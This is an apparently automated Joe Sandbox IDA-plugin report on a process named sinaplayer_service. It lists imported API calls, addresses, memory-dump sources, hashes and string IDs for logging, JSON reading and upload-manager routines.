                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372094
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037209D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(0039D874,00000000), ref: 003720D7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$Contructor
                                                                                                                                                                                                    • API String ID: 2340524257-3196316403
                                                                                                                                                                                                    • Opcode ID: 7bffc24f69f6ba40dd22cf71970ed76bce195d0c5bd3abaabe73b95f9b9d3468
                                                                                                                                                                                                    • Instruction ID: 39bb2503c50abbf86e10e2ef55c3612571fa4ae7ac56cba0059d788a8a15911a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bffc24f69f6ba40dd22cf71970ed76bce195d0c5bd3abaabe73b95f9b9d3468
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98616271900348DFDB22DFA4DD4AB9EBBB8FB04304F008999E45AA7291DB75A948CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF0C
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AF2F
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF69
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037AFA3
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037AFC0
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AFDD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037B000
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B011
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B02B
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B049
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B058
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0BB
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0C7
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0D0
                                                                                                                                                                                                    • ?IsRunning@Thread@base@@QBE_NXZ.BASE ref: 0037B0D8
                                                                                                                                                                                                    • ?Start@Thread@base@@QAE_NXZ.BASE ref: 0037B0E4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@Thread@base@@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputRunning@Start@StringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr::Start$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1930787510-1479475722
                                                                                                                                                                                                    • Opcode ID: 9c05521879995f3be869ef1dfa3e1195d40ba3353700c1414e3bdf71f6a3477b
                                                                                                                                                                                                    • Instruction ID: 5627d8a67b6da6cdfa49ef598a3801e3e7c8f865ab66810effb1c810e45e4edc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c05521879995f3be869ef1dfa3e1195d40ba3353700c1414e3bdf71f6a3477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52515075900209DFDF22EFA4ED4ABDDBBB8FB14304F00459AE409A7291DB759A44CF61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037A8C3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A8E6
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A920
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A95D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A97D
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A99A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037A9BD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A9CE
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037A9E8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A9F0
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037AA0E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037AA1D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA80
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA8C
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@V01@$?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@V01@_
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $SetShowDmpComplete show = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3133238190-660511650
                                                                                                                                                                                                    • Opcode ID: 42ca20efa9e9602aef21212a9fc10c4e377770ae1cc82aa7ffd6eeffa8f7404f
                                                                                                                                                                                                    • Instruction ID: 507c115d80529d44689732cfcb5d68722b72e3baa4bd59ae15843fe9b469146c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42ca20efa9e9602aef21212a9fc10c4e377770ae1cc82aa7ffd6eeffa8f7404f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED518171D002489FDF22DFA4DD4ABDDBBB8FB14344F00899AE40AA7291DB759A48CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C574A47
                                                                                                                                                                                                    • Concurrency::SchedulerPolicy::SchedulerPolicy.LIBCMT(?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?,6C573A7E,?,6C5648CA), ref: 6C574A62
                                                                                                                                                                                                      • Part of subcall function 6C576F6A: ??2@YAPAXI@Z.MSVCR120(00000028,00000180,?,6C574A67,?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?,6C573A7E), ref: 6C576F72
                                                                                                                                                                                                      • Part of subcall function 6C576F6A: memcpy.MSVCR120(00000000,?,00000028,00000028,00000180,?,6C574A67,?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?), ref: 6C576F81
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574382
                                                                                                                                                                                                      • Part of subcall function 6C57433D: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6C574392
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6C574399
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6C574A97), ref: 6C5743C3
                                                                                                                                                                                                      • Part of subcall function 6C57433D: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574A97), ref: 6C5743D8
                                                                                                                                                                                                      • Part of subcall function 6C57433D: InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6C574A97), ref: 6C5743DE
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574443
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6C574453
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6C57445A
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6C574AC1), ref: 6C574484
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574AC1), ref: 6C574499
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574AC1), ref: 6C57449F
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C574AC7
                                                                                                                                                                                                      • Part of subcall function 6C575C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6C574ACC,?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C575C35
                                                                                                                                                                                                      • Part of subcall function 6C574A04: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?,00000180,6C574B22), ref: 6C574A21
                                                                                                                                                                                                      • Part of subcall function 6C574A04: memset.MSVCR120(00000000,00000000,?,00000000,?,?,?,00000180,6C574B22), ref: 6C574A32
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BC6
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BCF
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BD8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BE1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000000), ref: 6C574BED
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000004,00000000), ref: 6C574BFA
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000007,00000004,00000000), ref: 6C574C08
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000007,00000004,00000000), ref: 6C574C1C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000001,00000007,00000004,00000000), ref: 6C5A2ED9
                                                                                                                                                                                                      • Part of subcall function 6C576F10: TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                      • Part of subcall function 6C573C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6C573C1B
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,6C5C39D0,?,000000FF,00000000), ref: 6C574C60
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6C574C6E
                                                                                                                                                                                                      • Part of subcall function 6C573E7E: __EH_prolog3.LIBCMT ref: 6C573E85
                                                                                                                                                                                                      • Part of subcall function 6C576FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6C577032
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2EE3
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2EF9
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000), ref: 6C5A2F07
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000), ref: 6C5A2F0C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F22
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6C5C3192,?,7FFFFFFF,7FFFFFFF,00000000), ref: 6C5A2F46
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2F54
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F6A
Memory Dump Source
• Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Initialize$HeadList$Concurrency@@Scheduler$ElementKey@2@@Policy@Value@$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastTimermemset$CreateVersion@__crt$??0_AllocBlockingConcurrency::CriticalEventExceptionLock@details@Manager@1@ObjectPolicy::QueueReentrantRegisterResourceSectionSingleThreadpoolThrowWait___crtmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1785735614-0
                                                                                                                                                                                                    • Opcode ID: f6eb4c533dfa83e887d4e699264bc3dada3c32883abd1ef7a5a09f5ec25a54f3
                                                                                                                                                                                                    • Instruction ID: 6727d9db3822f11bbec131ef61bc9cb50c8e50896f23f2ae4b6c1ca73225c804
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6eb4c533dfa83e887d4e699264bc3dada3c32883abd1ef7a5a09f5ec25a54f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72912DB0A01646FBD718DF7AC984AD9FBA8BF58304F50422ED42D97B40DB34A554CFA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 0039846E
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0039849B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000001C), ref: 003984C5
                                                                                                                                                                                                    • ??0MemoryMappedFile@base@@QAE@XZ.BASE ref: 003984DD
                                                                                                                                                                                                    • ?Initialize@MemoryMappedFile@base@@QAE_NABVFilePath@2@@Z.BASE(?), ref: 003984FC
                                                                                                                                                                                                    • ??1MemoryMappedFile@base@@QAE@XZ.BASE(?,?), ref: 00398531
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398538
                                                                                                                                                                                                    • ?Read@JSONReader@base@@SAPAVValue@2@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@Z.BASE(?), ref: 003985A6
                                                                                                                                                                                                    • ?GetString@DictionaryValue@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV34@@Z.BASE(?,00000000), ref: 0039862B
                                                                                                                                                                                                    • ?GetString@DictionaryValue@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAV34@@Z.BASE(?,00000000), ref: 00398664
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?), ref: 003986DE
                                                                                                                                                                                                    • ?SysUTF8ToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z.BASE(?,?,00000000), ref: 0039871C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0039873E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398761
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398794
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 003987BB
                                                                                                                                                                                                    Strings
Memory Dump Source
